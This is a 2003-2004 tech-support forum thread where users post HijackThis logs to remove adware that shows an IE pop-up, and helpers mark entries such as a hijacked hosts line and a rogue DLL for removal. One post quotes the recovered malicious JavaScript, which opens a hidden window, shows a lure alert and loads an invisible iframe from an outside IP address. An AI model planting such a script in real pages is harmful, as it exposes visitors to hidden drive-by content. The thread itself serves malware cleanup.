i've got a pop up that runs when i open a new IE window (not consistantly - maybe every 15th time) - phony dialogue box type of pop up. reads "hey dude. click ok to see fresh teens". nothing is taking care of this. i searched it, but the only forum i saw that specifically mentioned this was in polish. adaware, spybot, CWSshredder - nothing touches it. help would be appreciated.

Have you disabled "messenger in the control panel under adminstrative tools>services>scroll down to messenger and right click select properties and select disable instead of automatic. This service has nothing to do with msn messenger, and is not needed by any average user. If it does not work you will need to try "hijackthis" from http://www.lukhere.com and post the log at that website's nastie's forum or back here. If you post the log here, be sure to state that you used Spybot and Adaware and they did not work.

My review and proof skills are the pits "lurkhere" is the website you are looking for, and hijackthis" is found under "nice files.

here is my hijackthis log. i went to lukhere, but didn't see any forums, or downloads for that matter. if anyone can help out, i'd appreciate it.

Logfile of HijackThis v1.97.7
Scan saved at 4:03:12 PM, on 12/10/2003
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
D:\WINNT\System32\smss.exe
D:\WINNT\system32\winlogon.exe
D:\WINNT\system32\services.exe
D:\WINNT\system32\lsass.exe
D:\WINNT\system32\svchost.exe
D:\WINNT\system32\spoolsv.exe
D:\Program Files\NavNT\defwatch.exe
D:\WINNT\System32\svchost.exe
D:\WINNT\system32\cba\pds.exe
D:\Program Files\SSC\NSCTOP.EXE
D:\WINNT\system32\regsvc.exe
D:\WINNT\system32\MSTask.exe
D:\WINNT\System32\tcpsvcs.exe
D:\WINNT\System32\WBEM\WinMgmt.exe
D:\Program Files\ORL\VNC\WinVNC.exe
D:\WINNT\System32\mspmspsv.exe
D:\WINNT\system32\ams_ii\hndlrsvc.exe
D:\WINNT\system32\MsgSys.EXE
D:\WINNT\system32\ams_ii\iao.exe
D:\WINNT\system32\cba\xfr.exe
D:\WINNT\Explorer.exe
D:\Program Files\SVA Player\SVAPLAYER.EXE
D:\WINNT\loadqm.exe
D:\Program Files\Common Files\Real\Update_OB\realsched.exe
D:\Program Files\WinZip\WZQKPICK.EXE
D:\Program Files\Microsoft Office\Office\OUTLOOK.EXE
D:\Program Files\Common Files\System\MAPI\1033\nt\MAPISP32.EXE
D:\Program Files\Autodesk Architectural Desktop 3\acad.exe
D:\Program Files\Autodesk Architectural Desktop 3\acad.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\Program Files\MSN Messenger\msnmsgr.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\Program Files\Adobe\Acrobat 5.0\Reader\AcroRd32.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\WINNT\System32\taskmgr.exe
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\PROGRA~1\WINZIP\winzip32.exe
D:\Documents and Settings\paul\Local Settings\Temp\HijackThis.exe

O1 - Hosts: 203.161.127.141 www.dcsresearch.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {f760cb9e-c60f-4a89-890e-fae8b849493e} - D:\WINNT\madise.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [WinVNC] "D:\Program Files\ORL\VNC\WinVNC.exe" -servicehelper
O4 - HKLM\..\Run: [SVAPlayer] D:\Program Files\SVA Player\SVAPLAYER.EXE
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Ad-aware] "D:\Program Files\Lavasoft\Ad-aware 6\Ad-aware.exe" +c
O4 - HKLM\..\Run: [TkBellExe] "D:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [WinampAgent] "D:\Program Files\Winamp\Winampa.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = D:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: WinZip Quick Pick.lnk = D:\Program Files\WinZip\WZQKPICK.EXE
O12 - Plugin for .bcf: D:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: D:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/20791ddcd289ffe24b19/netzip/RdxIE601.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37943.4360648148
O16 - DPF: {A3009861-330C-4E10-822B-39D16EC8829D} (CRAVOnline Object) - http://www.ravantivirus.com/scan/ravonline.cab
O16 - DPF: {CA034DCC-A580-4333-B52F-15F98C42E04C} (Downloader Class) - https://www.stopzilla.com/_download/Auto_Installer/dwnldr.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://active.macromedia.com/flash2/cabs/swflash.cab
O16 - DPF: {f760cb9e-c60f-4a89-890e-fae8b849493e} (IRDIXAObj Class) -
O17 - HKLM\System\CCS\Services\Tcpip\..\{DECD798C-A65B-4ACC-BBB8-F0941B6F2BA5}: NameServer = 216.211.192.2,216.211.192.6

Have a look at the link below, it offers freeware pop-blockers, for most internet user getting a pop-up stopper is a MUST.

Others prefer to turn this function on from their web browsers or firewall.

Freeware pop-up Stoppers

ER4S3R.

Report Offensive Follow Up For Removal

Hi Silly, run hijack this again, checkmark
the box next to the lines below, and
click "fixed checked" and restart your
computer.

O1 - Hosts: 203.161.127.141 www.dcsresearch.com

O2 - BHO: (no name) - {f760cb9e-c60f-4a89-890e-fae8b849493e} - D:\WINNT\madise.dll

O4 - HKLM\..\Run: [TkBellExe] "D:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot

O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} (RdxIE Class) - http://207.188.7.150/20791ddcd289ffe24b19/netzip/RdxIE601.cab

O16 - DPF: {f760cb9e-c60f-4a89-890e-fae8b849493e} (IRDIXAObj Class) -

after restarting...go to "My Computer"....Local Disk [C]"......the WINNT folder........& find & delete madise.dll (Right click the file...then choose "delete".)

Post another log.

abnormal:

I did what you suggested - due to the randomness of the popups, it'll be hard to tell if it's fixed just from the popups themselves, but here is the hijackthis log, post fix. see whatcha think:

Logfile of HijackThis v1.97.7
Scan saved at 2:21:18 PM, on 12/11/2003
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
D:\WINNT\System32\smss.exe
D:\WINNT\system32\winlogon.exe
D:\WINNT\system32\services.exe
D:\WINNT\system32\lsass.exe
D:\WINNT\system32\svchost.exe
D:\WINNT\system32\spoolsv.exe
D:\Program Files\NavNT\defwatch.exe
D:\WINNT\System32\svchost.exe
D:\WINNT\system32\cba\pds.exe
D:\Program Files\SSC\NSCTOP.EXE
D:\WINNT\system32\regsvc.exe
D:\WINNT\system32\MSTask.exe
D:\WINNT\System32\tcpsvcs.exe
D:\WINNT\System32\WBEM\WinMgmt.exe
D:\WINNT\System32\mspmspsv.exe
D:\WINNT\system32\ams_ii\hndlrsvc.exe
D:\WINNT\system32\MsgSys.EXE
D:\WINNT\system32\ams_ii\iao.exe
D:\WINNT\system32\cba\xfr.exe
D:\WINNT\Explorer.exe
D:\Program Files\SVA Player\SVAPLAYER.EXE
D:\WINNT\loadqm.exe
D:\Program Files\WinZip\WZQKPICK.EXE
D:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\PROGRA~1\WINZIP\winzip32.exe
D:\Documents and Settings\paul\Local Settings\Temp\HijackThis.exe

O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [WinVNC] "D:\Program Files\ORL\VNC\WinVNC.exe" -servicehelper
O4 - HKLM\..\Run: [SVAPlayer] D:\Program Files\SVA Player\SVAPLAYER.EXE
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
O4 - HKLM\..\Run: [Ad-aware] "D:\Program Files\Lavasoft\Ad-aware 6\Ad-aware.exe" +c
O4 - HKLM\..\Run: [WinampAgent] "D:\Program Files\Winamp\Winampa.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Microsoft Office.lnk = D:\Program Files\Microsoft Office\Office\OSA9.EXE
O4 - Global Startup: WinZip Quick Pick.lnk = D:\Program Files\WinZip\WZQKPICK.EXE
O12 - Plugin for .bcf: D:\Program Files\Internet Explorer\Plugins\NPBelv32.dll
O12 - Plugin for .spop: D:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37943.4360648148
O16 - DPF: {A3009861-330C-4E10-822B-39D16EC8829D} (CRAVOnline Object) - http://www.ravantivirus.com/scan/ravonline.cab
O16 - DPF: {CA034DCC-A580-4333-B52F-15F98C42E04C} (Downloader Class) - https://www.stopzilla.com/_download/Auto_Installer/dwnldr.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://active.macromedia.com/flash2/cabs/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{DECD798C-A65B-4ACC-BBB8-F0941B6F2BA5}: NameServer = 216.211.192.2,216.211.192.6

Hi again Silly, you look ok to me.

One more thing, you don't need this;
O4 - HKLM\..\Run: [LoadQM] loadqm.exe
Removing that line should do it.

LoadQM.exe
(Microsoft)

This task loads the MSN Queue Manager and is installed when you install MSN Explorer or MSN Messenger. LOADQM gobbles up system resources and appears on most end-users’ Task Lists who come to us complaining of low System & User Resources or very slow, "crawling", PCs. In January 2003 this is still one of the worst behaved Microsoft programs !

Recommendation :
Disable immediately, or Delete using Starter. Next, reboot your PC and find LOADQM in the C:\WINDOWS folder. Rename it to LOADQM.EXE.OLD as if you do not it will otherwise get put back in your Task List at some stage or other (on some PCs you may need to boot into Safe Mode before you are able to rename LOADQM). Note : LOADQM gets re-installed every time you install a new version of Microsoft’s MSN Messenger.

Here some tips I put together, to help
you stay clean.
Hijack prevention tips

Take care because we care

Abnormal

abby-
sincere and genuine thanks. what a mess.

I had that virus.

HijackThis, Spywareblaster, deleting cookies, cache & temporary files, wiping free space, all:

DID NOT FIX IT. There's no mention of it on Symantec or Microsoft sites.

I had used "Disk Investigator" to scan the raw data on my hard drive and I found this java

script:

<HTML>
<HEAD>
<SCRIPT language="JavaScript">
window.open ('min.html','smth' + parseInt(Math.ra..om() *

1000000),'directories=0,toolbar=0,menubar=0,personalbar=0,location=0,scrollbars=0,status=0,resi

zable=1,height=0,width=0,screenX=0,screenY=0,left=0,top=0');
alert ('Hey dude. Click OK to see fresh teens');
</SCRIPT>
</HEAD>
<BODY>
<iframe src="http://66.230.151.114/dxp/da.html" width=0 height=0></BODY>
</HTML>

BUT it is not part of a real file, i.e. this virus must write this, runs it, and then deletes

it faster than you can click.

You can see the math.random * 1000000...

I've seen both 66.230.151.114 and 66.230.134.150. I did a trace and found out that the

perpetrator of this virus is hosted at www.isprime.com

The perpetrator of this virus belongs in jail.

To get rid of it I had to go to
www.microsoft.com/downloads
and entirely re-install internet explorer 6.

Hope that helps.

I caught the same virus. I followed all of the instructions given by Abnormal and I think that my problem is gone. However, I keep having one tiny problem with Internet Explorer. Every time that I open up the web, my home page is www.search-space.com. I've tried to change it numerous times but it doesn't work. This problem arose when I started getting the annoying pop-up problem/virus earlier. Does anyone have any suggestions? Here is my Hijack This log:

Logfile of HijackThis v1.97.7
Scan saved at 10:36:54 AM, on 1/10/2004
Platform: Windows ME (Win9x 4.90.3000)
MSIE: Internet Explorer v5.50 (5.50.4134.0600)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\SSDPSRV.EXE
C:\PROGRAM FILES\WEBSVR\SYSTEM\INETSW95.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\RESTORE\STMGR.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\PROGRAM FILES\DELL\ACCESSDIRECT\DADAPP.EXE
C:\PROGRAM FILES\DELL\ACCESSDIRECT\DADTRAY.EXE
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPLPR.EXE
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPENH.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\NORTON ANTIVIRUS\NAVAPW32.EXE
C:\PROGRAM FILES\LOGITECH\MOUSEWARE\SYSTEM\EM_EXEC.EXE
C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\OSA.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\WORKS SHARED\WKCALREM.EXE
C:\PROGRAM FILES\LINKSYS\WIRELESS-B NOTEBOOK ADAPTER\WPC11CFG.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\SYSTEM\WINOA386.MOD
C:\WINDOWS\TEMP\TD_0006.DIR\HIJACKTHIS.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\WINOA386.MOD

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.dell.com/search/index.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.search-space.com/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.searchdot.net
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.searchdot.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dellnet.com
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 6.0\READER\ACTIVEX\ACROIEHELPER.DLL
O2 - BHO: Zero Popup - {2EF37A01-884F-11d5-AC99-B112050ECB4F} - C:\PROGRA~1\ZEROPO~1\ZERO-P~1.DLL
O3 - Toolbar: @msdxmLC.dll,-1@1033,&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [PCHealth] C:\WINDOWS\PCHealth\Support\PCHSchd.exe -s
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [DadApp] C:\Program Files\DELL\AccessDirect\dadapp.exe
O4 - HKLM\..\Run: [SynTPLpr] C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe
O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers
O4 - HKLM\..\Run: [Norton Auto-Protect] C:\PROGRA~1\NORTON~1\NAVAPW32.EXE /LOADQUIET
O4 - HKLM\..\Run: [Microsoft WebServer] C:\Program Files\WebSvr\System\svctrl /init
O4 - HKLM\..\Run: [Logitech Utility] Logi_MwX.Exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - HKLM\..\RunServices: [SSDPSRV] C:\WINDOWS\SYSTEM\ssdpsrv.exe
O4 - HKLM\..\RunServices: [*StateMgr] C:\WINDOWS\System\Restore\StateMgr.exe
O4 - HKLM\..\RunServices: [Microsoft WebServer] C:\Program Files\WebSvr\System\inetsw95 -w3svc
O4 - HKCU\..\Run: [winlogon] c:\windows\winlogon.exe
O4 - HKCU\..\Run: [QuickTime Task] c:\windows\qttasks.exe
O4 - HKCU\..\Run: [MoneyAgent] "C:\Program Files\Microsoft Money\System\Money Express.exe"
O4 - Startup: Office Startup.lnk = C:\Program Files\Microsoft Office\Office\OSA.EXE
O4 - Startup: Microsoft Works Calendar Reminders.lnk = C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe
O4 - Startup: Wireless-B Notebook Adapter Utility.lnk = C:\Program Files\Linksys\Wireless-B Notebook Adapter\WPC11Cfg.exe
O8 - Extra context menu item: &Define - C:\Program Files\Common Files\Microsoft Shared\Reference 2001\A\ERS_DEF.HTM
O8 - Extra context menu item: Look Up in &Encyclopedia - C:\Program Files\Common Files\Microsoft Shared\Reference 2001\A\ERS_ENC.HTM
O9 - Extra button: Messenger (HKLM)
O9 - Extra 'Tools' menuitem: MSN Messenger Service (HKLM)
O9 - Extra button: Encarta Encyclopedia (HKLM)
O9 - Extra 'Tools' menuitem: Encarta Encyclopedia (HKLM)
O9 - Extra button: Define (HKLM)
O9 - Extra 'Tools' menuitem: Define (HKLM)
O9 - Extra button: Dell Home (HKCU)
O14 - IERESET.INF: START_PAGE_URL=http://www.dellnet.com

Any suggestions would be very helpful. Thanks a lot!